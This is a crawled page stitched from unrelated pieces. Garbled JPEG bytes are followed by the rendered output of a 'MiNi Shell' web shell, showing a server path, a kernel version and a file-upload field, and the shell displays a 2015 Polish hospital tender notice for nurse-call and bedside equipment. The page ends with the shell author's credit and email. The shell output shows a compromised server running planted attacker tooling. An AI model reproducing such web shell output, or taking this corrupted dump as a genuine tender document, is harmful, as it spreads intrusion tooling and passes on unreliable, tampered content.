JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150318/59724-N-2015.html

<p class="kh_header"><b>Inowrocław: P r z e d m i o t e m zamówienia jest  dostawa  zestawów przywoławczych oraz zestawów przyłóżkowych dla Oddziału Wewnętrznego I na potrzeby Szpitala Wielospecjalistycznego w Inowrocławiu</b><br>
<b>Numer ogłoszenia: 59724 - 2015; data zamieszczenia: 18.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wielospecjalistyczny w Inowrocławiu , ul. Poznańska 97, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 052 3545587, faks 052 3574667.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pszozino.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> P r z e d m i o t e m zamówienia jest  dostawa  zestawów przywoławczych oraz zestawów przyłóżkowych dla Oddziału Wewnętrznego I na potrzeby Szpitala Wielospecjalistycznego w Inowrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

P r z e d m i o t e m zamówienia jest  dostawa  zestawów przywoławczych oraz zestawów przyłóżkowych dla Oddziału Wewnętrznego I na potrzeby Szpitala Wielospecjalistycznego w Inowrocławiu , których  szczegółowe parametry techniczne zostały opisane  poniżej:

1.	System przywoławczy
Wymagania techniczne :   
 - możliwość sprawdzenia przywołań,
-  możliwość kasowania wezwań,
-  możliwość wezwania lekarza,
-  czytelny panel wyświetlacza (LED)wyświetlanie wezwań przez wyświetlacz w kolorze     dedykowanym dla poszczególnych stanów zgłaszanych przez system.(zielony -  obecność, wezwanie-  kolor czerwony, możliwość równoczesnej prezentacji na wyświetlaczu wezwania i obecności)
- elementy systemu mają posiadać możliwość komunikacji elementów za pośrednictwem IR  na podczerwień (wezwanie personelu przez dostawionego pacjenta),
-  indywidualne adresy dla elementów systemu,
- wizualizacja pracy systemu (przywołania i ich rodzaje, kasowania, obecność pielęgniarek,  lekarzy, awaria elementów systemu, stany napięć w systemie),
- posiadanie pełnej możliwości programowania i konfiguracji elementów systemu,
- rejestracja zdarzeń, (data i czas wystąpienia przywołania,  data i czas reakcji personelu,   adres miejsca wywołania, adres wywołania łóżka chorego),
- scentralizowana praca systemu,
- pełna kompatybilność systemu i jego podzespołów z zamontowanym systemem FACI
- okres trwania gwarancji - minimum  36 MIESIĘCY 
- czas reakcji serwisu w przypadku awarii- maksimum 48 GODZIN
- możliwość zdalnego serwisowania (sieć IP)
- elementy systemu  muszą być  zabezpieczone zwarciowo i napięciowo(błąd przy połączeniu  elementu  systemu nie uszkadza elementu  ani całego systemu)
- menu systemu, komunikaty, oprogramowanie w języku polskim,
- termin zabezpieczenia części zamiennych -  10 LAT 

2.	Wykaz elementów systemu przywoławczego dla I Oddziału Wewnętrznego.

	Przycisk gruszkowy z zał. oświetlenia				41 szt.
	Przycisk przywoławczy z gniazdem				41 szt.
	Przycisk kasująco przywoławczy			               	27 szt.
	Przycisk przywoławczy lekarza				                2 szt.
	Sygnalizator LED					              21 szt.
	Przycisk pociągowy WC					              13 szt.
	Wyświetlacz korytarzowy					2 szt.
	Centralka						              1 szt.
	Zasilacz							1 szt.
2.10  Moduł komunikacji GETWAY					2 szt.

             3. Zestawy nad łóżkowe 

3.1.	Zestaw nad łóżkowy  podwójny					5 szt.
3.2.	Zestaw nad łóżkowy podwójny (SALA R)		              2 szt.
3.3.	Zestaw nad łóżkowy potrójny				8 szt.

                    Konfiguracja zestawów sale chorych (dla 1 łóżka):
1.	Oświetlenie LED dzienne (górne 230V AC) zapalane z wyłącznika przy wejściu na salę 
2.	Oświetlenie LED miejscowe (dolne 230V AC)zapalane z manipulatora  
3.	Oświetlenie nocne punktowe LED (dolne 230V ACV AC) zapalane z manipulatora   
4.	Gniazdo sieciowe pojedyncze 16A z kołkiem (6 szt.) z podziałem na 3 obwody
5.	Gniazdo telefoniczne Rj  
6.	Punkt poboru TLEN - gniazda Insmed Rzeszów
7.	Punkt poboru AIR - gniazda Insmed Rzeszów
8.	Gniazda Rj, 230V mają być zlicowane z panelem
                   Konfiguracja zestawów Sala Intensywnego Nadzoru (dla 1 łóżka) SALA R:
1.	Oświetlenie LED dzienne (górne 230V AC) zapalane z wyłącznika przy wejściu na salę
2.	Oświetlenie LED miejscowe (dolne 230V AC)zapalane z manipulatora
3.	Oświetlenie nocne punktowe LED (dolne 230V AC) zapalane z manipulatora
4.	Gniazdo sieciowe pojedyncze 16A z kołkiem (9 szt.) z podziałem na 3 obwody
5.	Punkt poboru TLEN - gniazda Insmed Rzeszów
6.	Punkt poboru AIR - gniazda Insmed Rzeszów
7.	Punkt poboru VAC - gniazda Insmed Rzeszów
8.	Gniazda Rj, 230V mają być zlicowane z panelem

UWAGA !!!!!
1.	Wszystkie elementy systemu przywoławczego muszą być kompatybilne i posiadać te same   możliwości co cały system montowany w Oddziale. 
2.	Najpóźniej w dniu podpisania umowy wykonawca przedłoży parametry techniczne podłączenia zestawów do instalacji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 32.00.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium ustala się w wysokości  : 
             4 300,00 zł 
	
1.  Miejsce wnoszenia wadium w pieniądzu na wskazany rachunek bankowy:
     GETIN NOBLE BANK SPÓŁKA AKCYJNA z siedzibą przy ul. Przykopowej 33,    
01-208 Warszawa
                   Nr 69 1560 0013 2514 6086 2000 0004

2. Wadium wnoszone w pieniądzu można wpłacać przelewem na wskazane konto.
3. Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do 
    oferty. 
4. Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji 
    ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju,
    Przedsiębiorczości, należy dołączyć do oferty w formie nienaruszonego oryginału lub
    zdeponować w kasie u Zamawiającego, a kopię załączyć do oferty.
5. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób
    reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego 
   (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób
   umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny
   (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na
   każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, 
   zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium 
   w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych. 

6. Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert  
    tj. do dni 26.03.2015r. godz. 9:30
 7. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą
     wadium w wyznaczonym terminie zostanie wykluczony z postępowania.
 8. Dyspozycję w zakresie zwrotu wniesionych w pieniądzu wadiów wykonawców,
      Zamawiający przekaże do banku niezwłocznie po:
a) wyborze najkorzystniejszej oferty, unieważnieniu postępowania o udzielenie niniejszego zamówienia    publicznego, za wyjątkiem Wykonawcy  , którego oferta została uznana za najkorzystniejszą -z zastrzeżeniem art. 46  ust. 4 a ustawy Pzp. oraz niezwłocznie  na wniosek Wykonawcy , który wycofał ofertę przed upływem  terminu      spływania ofert. 
b) zawarciu umowy w sprawie zamówienia publicznego.
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 z przyczyn leżących po jego stronie, nie złożył  dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt.5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt.3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta zostanie wybrana:
      a) odmówi podpisania umowy  na warunkach określonych w ofercie,
      b) zawarcie umowy  w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia określonego w części III SIWZ ubiegać się wykonawcy którzy:

a) nie podlegają wykluczeniu na podstawie przepisów art. 24 ust. 1,2 i 2a ustawy Pzp ,
b) spełniają warunki określone przepisami art. 22 ust. 1 pkt 1-4 ustawy Pzp 
c) zrealizowali dostawy w okresie ostatnich trzech lat przed upływem terminu składania  ofert, a jeżeli okres  działalności jest krótszy - w tym okresie,(w tym przynajmniej jedna o wartości 50.000,00 zł netto) wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy  zostały wykonane oraz załączeniem dowodów czy zostały wykonane lub są wykonywane należycie.
    
     Dowodami, o których mowa w pkt.1 lit.c) są poświadczenia, z tym że w odniesieniu do
     nadal wykonywanych dostaw okresowych lub ciągłych poświadczenie powinno być 
    wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert lub
    oświadczenie Wykonawcy-jeżeli z uzasadnionych przyczyn o obiektywnym charakterze
    wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa wyżej.
 
2.  Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, na zasadach określonych w art. 24 ust. 2a ustawy Pzp. 

 3.   Zamawiający   dokona oceny spełniania warunków na podstawie dokumentów
      dołączonych celem ich wykazania wymienionych w pkt. IX  SWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie  wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również
wykonywanych, głównych dostaw , w okresie ostatnich trzech lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,(w tym przynajmniej jedna o wartości 50.000,00 zł netto) wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których  dostawy lub usługi zostały wykonane, oraz załączeniem dowodów1, czy zostały wykonane    lub są wykonywane należycie;
      1/  Dowodami, o których mowa w pkt 2 lit.a SIWZ  są poświadczenia, z tym że w
         odniesieniu do nadal wykonywanych dostaw  okresowych lub ciągłych  poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu  składania ofert lub oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa wyżej 
         
         Uwaga!
          W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa    odpowiednio w  pkt.  VIII 1 lit. c i w pkt. IX 2 lit. a SIWZ  wzbudzą wątpliwości zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynikać będzie, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, zamawiający ma prawo  zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego dostawy  były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu.

(Podstawa prawna : ROZPORZĄDZENIE PREZESA RADY MINISTRÓW
z dnia 19 lutego 2013 r.w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświdczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a.	Oświadczenie o udzieleniu gwarancji min  36 MIESIĘCY
b.	Instrukcje DTL (dokumentacja techniczno - ruchowa)
c.	Przekroje/rysunki przedmiotu zamówienia</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oferta musi zawierać następujące dokumenty:
a)	 wypełniony formularz  -Oferta (zał. nr 1)
b)	 dowód wniesienia wadium,
c)	dokument, z którego wynika upoważnienie do podpisywania oferty lub pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli  osobą podpisującą nie jest osoba upoważniona na podstawie wpisu z rejestru handlowego lub zaświadczenia o prowadzeniu działalności gospodarczej. Jeżeli pełnomocnictwo nie ma postaci aktu notarialnego powinno zawierać pieczęć Wykonawcy, imienną pieczątkę wystawiającego pełnomocnictwo i jego podpis,
d)	informacje w formie  listy podmiotów należących do jednej grupy kapitałowej, o 
                 której mowa w  art. 24 ust. 2 pkt 5 ustawy pzp  lub informacja o braku 
                 przynależności  do grupy kapitałowej. W przypadku składania odrębnych ofert      
                 przez Wykonawców należących do jednej grupy kapitałowej  należy przedłożyć   
                dokumenty wykazujące,  iż istniejące powiązania nie prowadzą do zachwiania 
                uczciwej konkurencji wśród  uczestników postępowania.
e)	opis części zamówienia, która zostanie powierzona podwykonawcy (jeżeli dotyczy), 
f)	w przypadku  gdy Wykonawca będzie polegać na wiedzy, doświadczeniu innych  podmiotów przedstawi w tym celu  pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji  niezbędnych zasobów na okres korzystania  z nich przy wykonywaniu zamówienia,
g)	schematy montażu i podłączenia zestawów wraz z paletą kolorów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin dostawy liczony w dniach (max 10 dni) - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pszozino.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wielospecjalistyczny im dra L. Błażka w w Inowrocławiu , ul. Poznańska 97, 88-100 Inowrocław, Dział Zamówień Publicznych (budynek administracyjny) pok. nr 02A lub 03..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2015 godzina 09:30, miejsce: Kancelaria Szpitala Wielospecjalistycznego im dra L. Błażka w w Inowrocławiu , ul. Poznańska 97, 88-100 Inowrocław (niski parter)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com